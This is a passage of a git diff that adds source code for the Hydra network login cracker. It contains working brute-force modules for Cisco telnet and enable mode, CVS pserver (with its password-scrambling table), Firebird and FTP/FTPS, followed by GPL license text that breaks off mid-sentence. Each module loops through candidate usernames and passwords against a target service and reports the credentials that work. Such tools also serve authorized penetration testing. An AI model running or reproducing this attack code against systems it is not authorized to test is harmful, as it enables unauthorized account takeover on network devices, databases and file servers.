hydra_get_next_login()) != 0) { + while ((buf = hydra_receive_line(sock)) != NULL && strstr(buf, "name:") == NULL && strstr(buf, "ogin:") == NULL) { + if (hydra_strcasestr(buf, "ress ENTER") != NULL) + hydra_send(sock, "\r\n", 2, 0); + free(buf); + } + + sprintf(buffer, "%.250s\r\n", login); + if (hydra_send(sock, buffer, strlen(buffer), 0) < 0) { + fprintf(stderr, "[ERROR] Child with pid %d terminating, can not send login\n", (int) getpid()); + hydra_child_exit(2); + } + } + + if (miscptr != NULL) { + while ((buf = hydra_receive_line(sock)) != NULL && strstr(buf, "assw") == NULL) { + if (hydra_strcasestr(buf, "ress ENTER") != NULL) + hydra_send(sock, "\r\n", 2, 0); + free(buf); + } + + sprintf(buffer, "%.250s\r\n", miscptr); + if (hydra_send(sock, buffer, strlen(buffer), 0) < 0) { + fprintf(stderr, "[ERROR] Child with pid %d terminating, can not send login\n", (int) getpid()); + hydra_child_exit(2); + } + } + + buf = hydra_receive_line(sock); + if (hydra_strcasestr(buf, "ress ENTER") != NULL) { + hydra_send(sock, "\r\n", 2, 0); + free(buf); + buf = hydra_receive_line(sock); + } + + if (strstr(buf, "assw") != NULL) { + fprintf(stderr, "[ERROR] Child with pid %d terminating - can not login, can not login\n", (int) getpid()); + hydra_child_exit(2); + } + free(buf); + + next_run = 2; + break; + } + case 2: /* run the cracking function */ + { + unsigned char *buf2; + int f = 0; + + sprintf(buffer, "%.250s\r\n", "ena"); + if (hydra_send(sock, buffer, strlen(buffer), 0) < 0) { + fprintf(stderr, "[ERROR] Child with pid %d terminating, can not send 'ena'\n", (int) getpid()); + hydra_child_exit(2); + } + + do { + if (f != 0) + free(buf2); + else + f = 1; + if ((buf2 = (unsigned char *) hydra_receive_line(sock)) == NULL) { + if (failc < retry) { + next_run = 1; + failc++; + fprintf(stderr, "[ERROR] Child with pid %d was disconnected - retrying (%d of %d retries)\n", (int) getpid(), failc, retry); + sleep(3); + break; + } else { + fprintf(stderr, "[ERROR] Child with pid %d was disconnected - exiting\n", (int) getpid()); + hydra_child_exit(0); + } + } + } while (strstr((char *) buf2, "assw") == NULL); + free(buf2); + if (next_run != 0) + break; + failc = 0; + + next_run = start_cisco_enable(sock, ip, port, options, miscptr, fp); + break; + } + case 3: /* clean exit */ + sprintf(buffer, "%.250s\r\n", "exit"); + if (hydra_send(sock, buffer, strlen(buffer), 0) < 0) { + fprintf(stderr, "[ERROR] Child with pid %d terminating, can not send 'exit'\n", (int) getpid()); + hydra_child_exit(0); + } + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + return; + default: + fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(0); + hydra_child_exit(2); + } + run = next_run; + } +} + +int service_cisco_enable_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-cisco.c b/hydra-cisco.c new file mode 100644 index 0000000..7be2e0f --- /dev/null +++ b/hydra-cisco.c @@ -0,0 +1,198 @@ +#ifdef PALM +#include "palm/hydra-mod.h" +#else +#include "hydra-mod.h" +#endif + +extern char *HYDRA_EXIT; +char *buf; + +int start_cisco(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = ""; + char *pass, buffer[300]; + + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + +#ifdef PALM + sprintf(buffer, "%s\r\n", pass); +#else + sprintf(buffer, "%.250s\r\n", pass); +#endif + + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + sleep(1); + do { + buf = hydra_receive_line(s); + if (buf[strlen(buf) - 1] == '\n') + buf[strlen(buf) - 1] = 0; + if (buf[strlen(buf) - 1] == '\r') + buf[strlen(buf) - 1] = 0; + } while (strlen(buf) <= 1); + if (strstr(buf, "assw") != NULL) { + hydra_completed_pair(); + free(buf); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + +#ifdef PALM + sprintf(buffer, "%s\r\n", pass); +#else + sprintf(buffer, "%.250s\r\n", pass); +#endif + + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + do { + buf = hydra_receive_line(s); + if (buf[strlen(buf) - 1] == '\n') + buf[strlen(buf) - 1] = 0; + if (buf[strlen(buf) - 1] == '\r') + buf[strlen(buf) - 1] = 0; + } while (strlen(buf) <= 1); + if (buf != NULL && strstr(buf, "assw") != NULL) { + hydra_completed_pair(); + free(buf); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + +#ifdef PALM + sprintf(buffer, "%s\r\n", pass); +#else + sprintf(buffer, "%.250s\r\n", pass); +#endif + + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + do { + buf = hydra_receive_line(s); + if (buf[strlen(buf) - 1] == '\n') + buf[strlen(buf) - 1] = 0; + if (buf[strlen(buf) - 1] == '\r') + buf[strlen(buf) - 1] = 0; + } while (strlen(buf) <= 1); + } + + } + + if (buf != NULL && (strstr(buf, "assw") != NULL || strstr(buf, "ad ") != NULL || strstr(buf, "attempt") != NULL || strstr(buf, "ailur") != NULL)) { + free(buf); + hydra_completed_pair(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; + } + + hydra_report_found_host(port, ip, "cisco", fp); + hydra_completed_pair_found(); + if (buf != NULL) + free(buf); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; +} + +void service_cisco(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, failc = 0, retry = 1, next_run = 1, sock = -1; + int myport = PORT_TELNET, mysslport = PORT_TELNET_SSL; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + while (1) { + next_run = 0; + switch (run) { + case 1: /* connect and service init function */ + { + unsigned char *buf2; + int f = 0; + + if (sock >= 0) + sock = hydra_disconnect(sock); +// usleep(275000); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + if (miscptr != NULL && hydra_strcasestr(miscptr, "enter") != NULL) + hydra_send(sock, "\r\n", 2, 0); + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = mysslport; + } + if (sock < 0) { + hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + do { + if (f != 0) + free(buf2); + else + f = 1; + if ((buf2 = (unsigned char *) hydra_receive_line(sock)) == NULL) { + if (failc < retry) { + next_run = 1; + failc++; + hydra_report(stderr, "[ERROR] Child with pid %d was disconnected - retrying (%d of %d retries)\n", (int) getpid(), failc, retry); + sleep(3); + break; + } else { + hydra_report(stderr, "[ERROR] Child with pid %d was disconnected - exiting\n", (int) getpid()); + hydra_child_exit(0); + } + } + if (buf2 != NULL && hydra_strcasestr(buf2, "ress ENTER") != NULL) + hydra_send(sock, "\r\n", 2, 0); + } while (strstr((char *) buf2, "assw") == NULL); + free(buf2); + if (next_run != 0) + break; + failc = 0; + next_run = 2; + break; + } + case 2: /* run the cracking function */ + next_run = start_cisco(sock, ip, port, options, miscptr, fp); + break; + case 3: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + return; + default: + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(0); +#ifdef PALM + return; +#else + hydra_child_exit(2); +#endif + } + run = next_run; + } +} + +int service_cisco_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-cvs.c b/hydra-cvs.c new file mode 100644 index 0000000..4dd130d --- /dev/null +++ b/hydra-cvs.c @@ -0,0 +1,151 @@ +#include "hydra-mod.h" + +extern int hydra_data_ready_timed(int socket, long sec, long usec); + +extern char *HYDRA_EXIT; +char *buf; + +int start_cvs(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = ""; + char *login, *pass, buffer[1024], pass2[513]; + int i; + char *directory = miscptr; + +/* evil cvs encryption sheme... + 0 111 P 125 p 58 +! 120 1 52 A 57 Q 55 a 121 q 113 +" 53 2 75 B 83 R 54 b 117 r 32 + 3 119 C 43 S 66 c 104 s 90 + 4 49 D 46 T 124 d 101 t 44 +% 109 5 34 E 102 U 126 e 100 u 98 +& 72 6 82 F 40 V 59 f 69 v 60 +' 108 7 81 G 89 W 47 g 73 w 51 +( 70 8 95 H 38 X 92 h 99 x 33 +) 64 9 65 I 103 Y 71 i 63 y 97 +* 76 : 112 J 45 Z 115 j 94 z 62 ++ 67 ; 86 K 50 k 93 +, 116 < 118 L 42 l 39 +- 74 = 110 M 123 m 37 +. 68 > 122 N 91 n 61 +/ 87 ? 105 O 35 _ 56 o 48 +*/ + + char key[] = { 0, 120, 53, 0, 0, 109, 72, 108, 70, 64, 76, 67, 116, 74, 68, 87, + 111, 52, 75, 119, 49, 34, 82, 81, 95, 65, 112, 86, 118, 110, 122, 105, + 0, 57, 83, 43, 46, 102, 40, 89, 38, 103, 45, 50, 42, 123, 91, 35, + 125, 55, 54, 66, 124, 126, 59, 47, 92, 71, 115, 0, 0, 0, 0, 56, + 0, 121, 117, 104, 101, 100, 69, 73, 99, 63, 94, 93, 39, 37, 61, 48, + 58, 113, 32, 90, 44, 98, 60, 51, 33, 97, 62 + }; + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + memset(pass2, 0, sizeof(pass2)); + strncpy(pass2, pass, 512); + + for (i = 0; i < strlen(pass); i++) { + pass2[i] = key[pass2[i] - 0x20]; + } + + snprintf(buffer, sizeof(buffer), "BEGIN VERIFICATION REQUEST\n%s\n%s\nA%s\nEND VERIFICATION REQUEST\n", directory, login, pass2); + + i = 57 + strlen(directory) + strlen(login) + strlen(pass2); + + if (hydra_send(s, buffer, i - 1, 0) < 0) { + return 1; + } + + if (hydra_data_ready_timed(s, 5, 0) > 0) { + buf = hydra_receive_line(s); + if (strstr(buf, "I LOVE YOU\n")) { + hydra_report_found_host(port, ip, "cvs", fp); + hydra_completed_pair_found(); + free(buf); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) { + return 3; + } + } else if (strstr(buf, "no such user") || strstr(buf, "E PAM start error: Critical error - immediate abort\n")) { + if (verbose) { + hydra_report(stderr, "[VERBOSE] User %s does not exist\n", login); + } + hydra_completed_pair_skip(); + free(buf); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) { + return 3; + } + } + /* "I HATE YOU\n" case */ + free(buf); + return 3; + } + + return 3; +} + +void service_cvs(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + int myport = PORT_CVS, mysslport = PORT_CVS_SSL; + + hydra_register_socket(sp); + + if ((miscptr == NULL) || (strlen(miscptr) == 0)) { + miscptr = "/root"; + } + + while (1) { + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + + switch (run) { + case 1: /* connect and service init function */ + if (sock >= 0) + sock = hydra_disconnect(sock); + +// usleep(300000); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = mysslport; + } + + if (sock < 0) { + hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + next_run = start_cvs(sock, ip, port, options, miscptr, fp); + break; + case 3: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(2); + return; + default: + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(2); + } + run = next_run; + } +} + +int service_cvs_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-firebird.c b/hydra-firebird.c new file mode 100644 index 0000000..6f2a889 --- /dev/null +++ b/hydra-firebird.c @@ -0,0 +1,160 @@ + +/* + +Firebird Support - by David Maciejak @ GMAIL dot com + +you need to pass full path to the fdb file as argument +default account is SYSDBA/masterkey + +on Firebird 2.0, access to the database file directly +is not possible anymore, in verbose mode you will see +the msg: "no permission for direct access to security database" + + */ + +#include "hydra-mod.h" + +#ifndef LIBFIREBIRD +void dummy_firebird() { + printf("\n"); +} +#else + +#include +#include + +#define DEFAULT_DB "C:\\Program Files\\Firebird\\Firebird_1_5\\security.fdb" + +extern char *HYDRA_EXIT; + +int start_firebird(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = ""; + char *login, *pass; + char database[256]; + char connection_string[1024]; + + isc_db_handle db; /* database handle */ + ISC_STATUS_ARRAY status; /* status vector */ + + char *dpb = NULL; /* DB parameter buffer */ + short dpb_length = 0; + + if (miscptr) + strncpy(database, miscptr, sizeof(database)); + else + strncpy(database, DEFAULT_DB, sizeof(database)); + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + dpb_length = (short) (1 + strlen(login) + 2 + strlen(pass) + 2); + if ((dpb = (char *) malloc(dpb_length)) == NULL) { + hydra_report(stderr, "[ERROR] Can't allocate memory\n"); + return 1; + } + + /* Add user and password to dpb */ + *dpb = isc_dpb_version1; + dpb_length = 1; + isc_modify_dpb(&dpb, &dpb_length, isc_dpb_user_name, login, strlen(login)); + isc_modify_dpb(&dpb, &dpb_length, isc_dpb_password, pass, strlen(pass)); + + /* Create connection string */ + snprintf(connection_string, sizeof(connection_string), "%s:%s", hydra_address2string(ip), database); + + if (isc_attach_database(status, 0, connection_string, &db, dpb_length, dpb)) { + /* for debugging perpose */ + if (verbose) { + hydra_report(stderr, "[VERBOSE] "); + isc_print_status(status); + } + isc_free(dpb); + hydra_completed_pair(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 2; + } else { + isc_detach_database(status, &db); + isc_free(dpb); + hydra_report_found_host(port, ip, "firebird", fp); + hydra_completed_pair_found(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 2; + } + return 1; +} + +void service_firebird(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + int myport = PORT_FIREBIRD, mysslport = PORT_FIREBIRD_SSL; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + + while (1) { + + switch (run) { + case 1: /* connect and service init function */ + if (sock >= 0) + sock = hydra_disconnect(sock); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = mysslport; + } + if (sock < 0) { + fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + + next_run = 2; + break; + + case 2: + + /* + * Here we start the password cracking process + */ + + next_run = start_firebird(sock, ip, port, options, miscptr, fp); + break; + case 3: + + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + return; + + default: + + fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(0); + } + run = next_run; + } +} + +#endif + +int service_firebird_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-ftp.c b/hydra-ftp.c new file mode 100644 index 0000000..985d21d --- /dev/null +++ b/hydra-ftp.c @@ -0,0 +1,188 @@ +#include "hydra-mod.h" + +extern char *HYDRA_EXIT; +char *buf; + +int start_ftp(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = "\"\""; + char *login, *pass, buffer[510]; + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + sprintf(buffer, "USER %.250s\r\n", login); + + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + buf = hydra_receive_line(s); + if (buf == NULL) + return 1; + /* special hack to identify 530 user unknown msg. suggested by Jean-Baptiste.BEAUFRETON@turbomeca.fr */ + if (buf[0] == '5' && buf[1] == '3' && buf[2] == '0') { + hydra_completed_pair_skip(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 4; + free(buf); + return 1; + } + // for servers supporting anon access without password + if (buf[0] == '2') { + hydra_report_found_host(port, ip, "ftp", fp); + hydra_completed_pair_found(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 4; + free(buf); + return 1; + } + if (buf[0] != '3') { + if (buf) { + if (verbose || debug) + hydra_report(stderr, "[ERROR] Not an FTP protocol or service shutdown: %s\n", buf); + free(buf); + } + return 3; + } + free(buf); + + sprintf(buffer, "PASS %.250s\r\n", pass); + + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + buf = hydra_receive_line(s); + if (buf == NULL) + return 1; + if (buf[0] == '2') { + hydra_report_found_host(port, ip, "ftp", fp); + hydra_completed_pair_found(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 4; + free(buf); + return 1; + } + + free(buf); + hydra_completed_pair(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 4; + + return 2; +} + +void service_ftp_core(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port, int tls) { + int run = 1, next_run = 1, sock = -1; + int myport = PORT_FTP, mysslport = PORT_FTP_SSL; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + hydra_child_exit(0); + while (1) { + switch (run) { + case 1: /* connect and service init function */ + if (sock >= 0) + sock = hydra_disconnect(sock); +// usleep(300000); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = mysslport; + } + if (sock < 0) { + if (verbose || debug) + hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + usleep(250); + buf = hydra_receive_line(sock); + if (buf == NULL || buf[0] != '2') { /* check the first line */ + if (verbose || debug) + hydra_report(stderr, "[ERROR] Not an FTP protocol or service shutdown: %s\n", buf); + hydra_child_exit(2); + if (buf != NULL) + free(buf); + hydra_child_exit(2); + } + + while (buf != NULL && strncmp(buf, "220 ", 4) != 0 && strstr(buf, "\n220 ") == NULL) { + free(buf); + buf = hydra_receive_line(sock); + } + free(buf); + + //this mode is manually chosen, so if it fails we giving up + if (tls) { + if (hydra_send(sock, "AUTH TLS\r\n", strlen("AUTH TLS\r\n"), 0) < 0) { + hydra_child_exit(2); + } + buf = hydra_receive_line(sock); + if (buf == NULL) { + if (verbose || debug) + hydra_report(stderr, "[ERROR] Not an FTP protocol or service shutdown: %s\n", buf); + hydra_child_exit(2); + } + if (buf[0] == '2') { + if ((hydra_connect_to_ssl(sock) == -1) && verbose) { + hydra_report(stderr, "[ERROR] Can't use TLS\n"); + hydra_child_exit(2); + } else { + if (verbose) + hydra_report(stderr, "[VERBOSE] TLS connection done\n"); + } + } else { + hydra_report(stderr, "[ERROR] TLS negotiation failed %s\n", buf); + hydra_child_exit(2); + } + free(buf); + } + + next_run = 2; + break; + case 2: /* run the cracking function */ + next_run = start_ftp(sock, ip, port, options, miscptr, fp); + break; + case 3: /* error exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(2); + case 4: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + default: + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(2); + } + run = next_run; + } +} + +void service_ftp(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + service_ftp_core(ip, sp, options, miscptr, fp, port, 0); +} + +void service_ftps(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + service_ftp_core(ip, sp, options, miscptr, fp, port, 1); +} + +int service_ftp_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-gtk/AUTHORS b/hydra-gtk/AUTHORS new file mode 100755 index 0000000..e69de29 diff --git a/hydra-gtk/COPYING b/hydra-gtk/COPYING new file mode 100755 index 0000000..d60c31a --- /dev/null +++ b/hydra-gtk/COPYING @@ -0,0 +1,340 @@ + GNU GENERAL PUBLIC LICENSE + Version 2, June 1991 + + Copyright (C) 1989, 1991 Free Software Foundation, Inc. + 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The licenses for most software are designed to take away your +freedom to share and change it. By contrast, the GNU General Public +License is intended to guarantee your freedom to share and change free +software--to make sure the software is free for all its users. This +General Public License applies to most of the Free Software +Foundation's software and to any other program whose authors commit to +using it. (Some other Free Software Foundation software is covered by +the GNU Library General Public License instead.) You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +this service if you wish), that you receive source code or can get it +if you want it, that you can change the software or use pieces of it +in new free programs; and that you know you can do these things. + + To protect your rights, we need to make restrictions that forbid +anyone to deny you these rights or to ask you to surrender the rights. +These restrictions translate to certain responsibilities for you if you +distribute copies of the software, or if you modify it. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must give the recipients all the rights that +you have. You must make sure that they, too, receive or can get the +source code. And you must show them these terms so they know their +rights. + + We protect your rights with two steps: (1) copyright the software, and +(2) offer you this license which gives you legal permission to copy, +distribute and/or modify the software. + + Also, for each author's protection and ours, we want to make certain +that everyone understands that there is no warranty for this free +software. If the software is modified by someone else and passed on, we +want its recipients to know that what they have is not the original, so +that any problems introduced by others will not reflect on the original +authors' reputations. + + Finally, any free program is threatened constantly by software +patents. We wish to avoid the danger that redistributors of a free +program will individually obtain patent licenses, in effect making the +program proprietary. To prevent this, we have made it clear that any +patent must be licensed for everyone's free use or not licensed at all. + + The precise terms and conditions for copying, distribution and +modification follow. + + GNU GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. This License applies to any program or other work which contains +a notice placed by the copyright holder saying it may be distributed +under the terms of this General Public License. The "Program", below, +refers to any such program or work, and a "work based on the Program" +means either the Program or any derivative work under copyright law: +that is to say, a work containing the Program or a portion of it, +either verbatim or with modifications and/or translated into another +language. (Hereinafter, translation is included without limitation in +the term "modification".) Each licensee is addressed as "you". + +Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. The act of +running the Program is not restricted, and the output from the Program +is covered only if its contents constitute a work based on the +Program (independent of having been made by running the Program). +Whether that is true depends on what the Program does. + + 1. You may copy and distribute verbatim copies of the Program's +source code as you receive it, in any medium, provided that you +conspicuously and appropriately publish on each copy an appropriate +copyright notice and disclaimer of warranty; keep intact all the +notices that refer to this License and to the absence of any warranty; +and give any other recipients of the Program a copy of this License +along with the Program. + +You may charge a fee for the physical act of transferring a copy, and +you may at your option offer warranty protection in exchange for a fee. + + 2. You may modify your copy or copies of the Program or any portion +of it, thus forming a work based on the Program, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) You must cause the modified files to carry prominent notices + stating that you changed the files and the date of any change. + + b) You must cause any work that you distribute or publish, that in + whole or in part contains or is derived from the Program or any + part thereof, to be licensed as a whole at no charge to all third + parties under the terms of this License. + + c) If the modified program normally reads commands interactively + when run, you must cause it, when started running for such + interactive use in the most ordinary way, to print or display an + announcement including an appropriate copyright notice and a + notice that there is no warranty (or else, saying that you provide + a warranty) and that users may redistribute the program under + these conditions, and telling the user how to view a copy of this + License. (Exception: if the Program itself is interactive but + does not normally print such an announcement, your work based on + the Program is not required to print an announcement.) + +These requirements apply to the modified work as a whole. If +identifiable sections of that work are not derived from the Program, +and can be reasonably considered independent and separate works in +themselves, then this License, and its terms, do not apply to those +sections when you distribute them as separate works. But when you +distribute the same sections as part of a whole which is a work based +on the Program, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote it. + +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Program. + +In addition, mere aggregation of another work not based on the Program +with the Program (or with a work based on the Program) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. You may copy and distribute the Program (or a work based on it, +under Section 2) in object code or executable form under the terms of +Sections 1 and 2 above provided that you also do one of the following: + + a) Accompany it with the complete corresponding machine-readable + source code, which must be distributed under the terms of Sections + 1 and 2 above on a medium customarily used for software interchange; or, + + b) Accompany it with a written offer, valid for at least three + years, to give any third party, for a charge no more than your + cost of physically performing source distribution, a complete + machine-readable copy of the corresponding source code, to be + distributed under the terms of Sections 1 and 2 above on a medium + customarily used for software interchange; or, + + c) Accompany it with the information you received as to the offer + to distribute corresponding source code. (This alternative is + allowed only for noncommercial distribution and only if you + received the program in object code or executable form with such + an offer, in accord with Subsection b above.) + +The source code for a work means the preferred form of the work for +making modifications to it. For an executable work, complete source +code means all the source code for all modules it contains, plus any +associated interface definition files, plus the scripts used to +control compilation and installation of the executable. However, as a +special exception, the source code distributed need not include +anything that is normally distributed (in either source or binary +form) with the major components (compiler, kernel, and so on) of the +operating system on which the executable runs, unless that component +itself accompanies the executable. + +If distribution of executable or object code is made by offering +access to copy from a designated place, then offering equivalent +access to copy the source code from the same place counts as +distribution of the source code, even though third parties are not +compelled to copy the source along with the object code. + + 4. You may not copy, modify, sublicense, or distribute the Program +except as expressly provided under this License. Any attempt +otherwise to copy, modify, sublicense or distribute the Program is +void, and will automatically terminate your rights under this License. +However, parties who have received copies, or rights, from you under +this License will not have their licenses terminated so long as such +parties remain in full compliance. + + 5. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Program or its derivative works. These actions are +prohibited by law if you do not accept this License. Therefore, by +modifying or distributing the Program (or any work based on the +Program), you indicate your acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Program or works based on it. + + 6. Each time you redistribute the Program (or any work based on the +Program), the recipient automatically receives a license from the +original licensor to copy, distribute or modify the Program subject to +these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. +You are not responsible for enforcing compliance by third parties to +this License. + + 7. If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Program at all. For example, if a patent +license would not permit royalty-free redistribution of the Program by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Program. + +If any portion of this section is held invalid or unenforceable under +any particular circumstance, the balance of the section is intended to +apply and the section as a whole is intended to apply in other +circumstances. + +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system, which is +implemented by public license practices. Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 8. If the distribution and/or use of the Program is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Program under this License +may add an explicit geographical distribution limitation excluding +those countries, so that distribution is permitted only in or among +countries not thus excluded. In such case, this License incorporates +the limitation as if written in the body of this License. + + 9. The Free Software Foundation may publish revised and/or new versions +of the General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + +Each version is given a distinguishing version number. If the Program +specifies a version number of this License which applies to it and "any +later version", you have the option of following the terms and conditions +either of that version or of any later version published by the Free +Software Foundation. If the 